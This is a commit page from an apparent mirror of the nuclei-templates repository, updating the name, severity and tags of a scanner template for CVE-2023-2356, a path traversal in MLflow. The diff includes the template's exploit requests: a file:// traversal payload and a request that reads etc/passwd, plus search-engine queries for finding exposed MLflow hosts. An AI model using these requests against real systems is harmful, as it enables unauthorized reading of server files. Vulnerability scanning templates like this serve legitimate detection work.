daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

severity & name -updated

patch-1
pussycat0x 2023-05-23 12:02:34 +05:30 committed by GitHub
parent ed206e5c27
commit 717a7410d9
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 5 additions and 5 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

10
http/cves/2023/CVE-2023-2356.yaml
View File

@ -1,9 +1,9 @@
id: CVE-2023-2356
info:
name: Mlflow 5.2.5 - Local File Inclusion
name: Mlflow <2.3.0 - Local File Inclusion
author: Co5mos
severity: critical
severity: high
description: |
Relative Path Traversal in GitHub repository mlflow/mlflow prior to 2.3.1.
reference:
@ -15,10 +15,10 @@ info:
cve-id: CVE-2023-2356
cwe-id: CWE-23
metadata:
verified: "true"
shodan-query: http.title:"mlflow"
fofa-query: app="MLflow"
verified: "true"
tags: cve,cve2023,lfi,huntr,mlflow
tags: cve,cve2023,lfi,huntr,mlflow,oss
variables:
str: "{{rand_base(6)}}"
@ -37,7 +37,7 @@ http:
Host: {{Hostname}}
Content-Type: application/json
{"name": "{{str}}", "source": "file://{{Hostname}}/../../../../../../../"}
{"name": "{{str}}", "source": "file://{{Hostname}}/../../../../../../../"}
- |
GET /model-versions/get-artifact?path=etc/passwd&name={{str}}&version={{version}} HTTP/1.1